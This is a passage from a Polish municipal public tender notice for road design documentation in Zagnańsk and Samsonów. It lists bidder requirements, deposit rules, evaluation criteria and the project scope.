                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                1.	Zamawiający przewiduje możliwość udzielenia w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu Wykonawcy usług, zamówień, o których mowa w art. 67 ust. 1 pkt 6 ustawy polegających na powtórzeniu podobnych robót budowlanych i zgodnych z przedmiotem zamówienia oraz jego wartość całkowita została uwzględniona przy obliczaniu jego wartości. 
2.	Zakres robót budowlanych będących przedmiotem zamówienia o którym mowa w art. 67 ust. 1 pkt 6 będą robotami podobnymi, które zostały przewidziane w niniejszym zamówieniu.
3.	Wartość zamówień udzielonych na postawie art. 67 ust. 1 pkt 6 ustawy, nie przekroczy 50% wartości zamówienia podstawowego. 
4.	W razie stwierdzenia konieczności udzielenia zamówienia, o którym mowa w art. 67 ust. 1 pkt 6  ustawy, Zamawiający zaprosi Wykonawcę do negocjacji w trybie zamówienia z wolnej ręki
<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 05/12/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 13/12/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określa warunków udziału w przedmiotowym zakresie <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca musi wykazać, że:
-posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 30 000,00 zł (gdy składa ofertę na zadanie A  ) 
	posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 60 000,00 zł (gdy składa ofertę na zadanie B)
	posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 
90 000,00 zł (gdy składa ofertę na zadanie A i B )
	posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 
30 000,00 zł (gdy składa ofertę na  zadanie A ) 
	posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 
60 000,00 zł (gdy składa ofertę na  zadanie B )
	posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 
90 000,00 zł (gdy składa ofertę na zadania A i B)

<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                wykonawca musi wykazać,że:
- wykonał należycie co najmniej jedną dokumentację projektowo  kosztorysową na budowę lub przebudowę drogi wraz z chodnikiem o długości minimum 200 m realizowanej na podstawie ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (j.t. Dz. U. z 2015r. poz. 2031 ze zm.)- dla Zadania A

- wykonał należycie co najmniej jedną dokumentację projektowo  kosztorysową na budowę lub przebudowę drogi wraz z chodnikiem o długości minimum 1100 m realizowanej na podstawie ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (j.t. Dz. U. z 2015r. poz. 2031 ze zm.)- dla Zadania B

- wykonał należycie co najmniej jedną dokumentację projektowo  kosztorysową na budowę lub przebudowę drogi wraz z chodnikiem o długości minimum 1300 m realizowanej na podstawie ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania 
i realizacji inwestycji w zakresie dróg publicznych (j.t. Dz. U. z 2015r. poz. 2031 ze zm.)- dla Zadania A i B


- Do wykazu należy załączyć dowody określające czy zostały wykonane lub są wykonywane należycie.
Dla Zadania A
- dysponuje co najmniej jedną osobą posiadająca uprawnienia budowlane uprawniające do projektowania w specjalności:
 -  drogowej, 
-   instalacyjnej w zakresie sieci, instalacji  gazowych, wodociągowych i kanalizacyjnych, 
-   w zakresie sieci, instalacji i urządzeń elektrycznych i energetycznych,  
Dla zadania B
- dysponuje co najmniej jedną osobą posiadająca uprawnienia budowlane uprawniające do projektowania w specjalności:
 -  drogowej, 
-   instalacyjnej w zakresie sieci, instalacji  gazowych, wodociągowych i kanalizacyjnych, 
-   w zakresie sieci, instalacji i urządzeń elektrycznych i energetycznych,  <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />3.1.informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert.
Wymagana forma  oryginał lub kopia poświadczenia za zgodność z oryginałem
3.2.dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Wymagana forma  oryginał lub kopia poświadczenia za zgodność z oryginałem 
3.3.wykaz usług wykonanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, wg załącznika nr  7 SIWZ,  oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; 
Wymagana forma:
wykaz usług - oryginał
referencje - oryginał lub kopia poświadczenia za zgodność z oryginałem
3.4.wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia
     publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami  wg załącznika nr 8 SIWZ 
Wymagana forma  oryginał 
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej lub należy wskazać dostępność tych dokumentów w formie elektronicznej pod wskazanym adresem internetowym;
Wymagana forma  oryginał lub kopia poświadczenia za zgodność z oryginałem 
a)	pełnomocnictwo określające jego zakres w przypadku, gdy Wykonawcę reprezentuje pełnomocnik, a umocowanie do złożenia oferty nie wynika z dokumentów rejestrowych;
Wymagana forma - oryginał lub kopia poświadczona przez notariusza
b)	pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego Wykonawców występujących wspólnie w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia;
Wymagana forma - oryginał lub kopia poświadczona przez notariusza
2.oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 Pzp - wg wzoru określonego w załączniku nr 4 do SIWZ. W przypadku przynależności do tej samej grupy kapitałowej, wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.   
Wymagana forma  oryginał
3.dowód wniesienia wadium  zgodnie z opisem w pkt. SIWZ.
4.Pisemne zobowiązanie podmiotów trzecich w sytuacji, gdy wykonawca polega na zdolnościach i zasobach innych podmiotów
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.Wykonawca przystępujący do postępowania jest obowiązany wnieść wadium 
w wysokości: Zadanie A  500 zł (słownie: pięćset złotych), Zadanie B - 1000 zł (słownie: tysiąc złotych). Wadium może być wpłacone łącznie na dwa zadania w sumarycznej kwocie   z obydwóch zadań  - 1500 zł (słownie: tysiąc pięćset złotych)
2.Wadium musi być wniesione przed upływem terminu składania ofert.
3.Wadium może być wniesione
a)	w pieniądzu,
b)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	w gwarancjach bankowych,
d)	w gwarancjach ubezpieczeniowych,
e)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r.  Nr 42, poz. 275 ze zm.).
4.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy  Zamawiającego w Banku Spółdzielczym w Samsonowie  nr 58 8512 0002 2001 0000 0143 0005 z dopiskiem Wadium w postępowaniu pn: Wykonanie projektów budowlanych: Wykonanie projektów budowlanych: Wykonanie projektu budowlanego Przebudowa
 ul. Słonecznej w Zagnańsku w ramach Programu Rewitalizacji Gminy Zagnańsk,, Zadania B - Projekt budowy drogi w msc. Samsonów ul. Rurarnia- Wskazać numer zadania A lub/ i B,  którego wadium dotyczy.


5.Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany w punkcie  4 rachunek bankowy Zamawiającego, najpóźniej przed upływem terminu składania ofert. Ze względu na ryzyko związane z czasem trwania okresu rozliczeń międzybankowych Zamawiający zaleca dokonanie przelewu ze stosownym wyprzedzeniem.
6.W przypadku wniesienia wadium w formie poręczeń lub gwarancji - wraz z ofertą należy złożyć oryginał dokumentu potwierdzającego wniesienie wadium.
Uwaga!
Zamawiający zwracając wadium w trybie art. 46 ustawy, zwróci Wykonawcy oryginał dokumentu wadium, wobec tego zaleca się nie spinać w sposób trwały oryginału dokumentu wadium z ofertą. Dodatkowo wskazane jest dołączenie do oferty kopii tego dokumentu poświadczonej za zgodność z oryginałem.
7.Wadium musi być zabezpieczone na okres 30 dni, licząc dzień składania ofert, tj. musi obejmować termin związania ofertą.
8.Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
9.Zamawiający zwróci również wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. Wniosek o zwrot wadium musi być podpisany przez osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy.
10.Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a ustawy z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów, potwierdzających o których mowa w art. 25 ust.1 ustawy, oświadczeń , o których mowa w art. 25a ust. 1, pełnomocnictw, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej. 
11.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
      a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych  w ofercie,
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z   przyczyn leżących po stronie Wykonawcy.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>TERMIN WYKONANIA ZADANIA</td><td>20</td></tr><tr><td>DOŚWIACZENIE PROJEKTANTA BRANŻY DROGOWEJ </td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.Istotne dla stron warunku umowy określa wzór umowy stanowiący załącznik nr 5 do SIWZ.
2.Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, gdy zajdzie co najmniej jedna z okoliczności przewidziana we wzorze umowy oraz w powyższym punkcie SIWZ .
3.Zamawiający dopuszcza zmianę zawartej umowy w następujących okolicznościach;
1.Zmiany będące następstwem działania organów administracji, a niezawinione przez Wykonawcę  w szczególności:
a)	przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń,
c) wstrzymania prac lub przerw w pracach powstałych z przyczyn leżących po stronie Zamawiającego,
c) zajścia obiektywnych okoliczności, niezależnych od Wykonawcy z tytułu pozyskiwania zgód związanych z opracowaniem dokumentacji projektowo  kosztorysowej,
d) okres przygotowania (opracowania) nowych rozwiązań technicznych umożliwiającą prawidłową realizację zadania. Sytuacja taka może mieć miejsce w razie zmiany przepisów prawa po dacie zawarcia umowy,
e) w przypadku zmiany koncepcji przyjętej wcześniej przez Zamawiającego, o okres jaki Zamawiający przedłużył przyjęty w Urzędzie Gminy w Zagnańsku siedmiodniowy termin uzgodnienia koncepcji wstępnej projektu lub odpowiedzi na pytanie dotyczące jej wykonania,
f ) zwiększenie zakresu projektowego o którym mowa w rozdziale 5 SIWZ,
2.Wykonawca zobowiązany jest do niezwłocznego poinformowania Zamawiającego 
o wystąpieniu przypadków, o  których  mowa w pkt. 1 lit a)  d), a także udokumentowania zaistnienia tych okoliczności.
4.Wszystkie powyższe postanowienia stanowią katalog zmian które przed wprowadzeniem do umowy wymagają zgodnej akceptacji stron umowy 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 24/04/2017, godzina: 14:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Przebudowa ul. Słonecznej w Zagnańsku w ramach Programu Rewitalizacji Gminy Zagnańsk. <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Wykonanie map dla celów projektowych z uwzględnieniem źródłowej dokumentacji geodezyjnej (celem weryfikacji granic) w zakresie niezbędnym do opracowania przedmiotowej dokumentacji, w skali 1:500
2. Opracowanie dokumentacji geotechnicznej  4 egz.
3. Wykonanie operatu i uzyskanie pozwolenia wodnoprawnego.
4. Wykonanie koncepcji projektu celem akceptacji przez Zamawiającego.
5. Opracowanie projektu budowlanego i wykonawczego drogi oraz innych projektów koniecznych do przebudowy wszystkich kolidujących sieci i urządzeń infrastruktury technicznej, zgodnie z uzyskanymi przez Wykonawcę warunkami technicznymi od zarządców sieci, z podziałem na poszczególne branże wraz z wszelkimi uzgodnieniami m.in. uzyskanie w imieniu Zamawiającego ostatecznej decyzji o zezwoleniu na realizację inwestycji drogowej i dokonanie stosownych zgłoszeń robót niewymagających pozwolenia na budowę. Wykonawca wystąpi do zarządcy drogi powiatowej Nr 0300T, Powiatowego Zarządu Dróg w Kielcach o wydanie warunków technicznych na projektowanie wraz ze wszystkimi uzgodnieniami oraz do Lasów Państwowych w sprawie wytycznych do projektowania.
6. Zaprojektować asfaltowy pas jezdny drogi (alternatywnie z kostki brukowej) wraz z zawrotką na końcu (działka Nr ewid. 472-zachować maksymalnie istniejący drzewostan).
7. Zaprojektować jednostronny chodnik przyjezdniowy z kostki betonowej koloru czerwonego  (dopuszcza się możliwość rezygnacji z projektowania chodnika w przypadku problemów z jego lokalizacją w granicach własności gminy). 
8. Zaprojektować zjazdy na posesje w granicach pasa drogowego z koski betonowej koloru szarego oraz dojścia do furtek do wszystkich nieruchomości przylegających do projektowanej drogi. Zapewnić na etapie projektowania możliwość dojazdu do działki Nr ewid. 461, zaprojektować zjazd. Lokalizację zjazdów uzgodnić z właścicielami nieruchomości.
9. Doprojektować oświetlenie uliczne w zakresie od istniejącego słupa przy posesji Nr 5, działka. nr ewid 474/6 do końca drogi na działce nr 472(przewidziana do zaprojektowania zawrotka).
10. Założyć przebudowę kolidujących z pasem drogowym słupów energetycznych(m.in. słup podwójny przy działce nr ewid. 474/11.
11. Założyć przebudowę słupa telekomunikacyjnego zlokalizowanego przy działce nr ewid. 474/12.
12. Zaprojektować rów odwadniający, spływ wody w kierunku istniejącego rowu przy drodze powiatowej(założyć czyszczenie rowu przy drodze powiatowej w prawo w kierunku msc Bartków do pierwszego przepustu drogowego), alternatywnie kanalizację deszczową.
13.Zaprojektować przepust pod projektowaną drogą na jej włączeniu do drogi powiatowej.
14.Przewidzieć przebudowę istniejącej sieci wodociągowej wraz z przyłączami, przebudowę  kanalizacji sanitarnej wraz z przyłączami i przełożenie jej z gruntów prywatnych w pas drogowy oraz usunięcia ewentualnej kolizji sieci (przyłączy) gazowych.
15.Przewidzieć zamontowanie na istniejącej studni wody pitnej zlokalizowanej w pasie drogowym zdroju czerpalnego z pompowaniem ręcznym lub jeżeli będzie taka możliwość pozostawić w istniejącej formie.
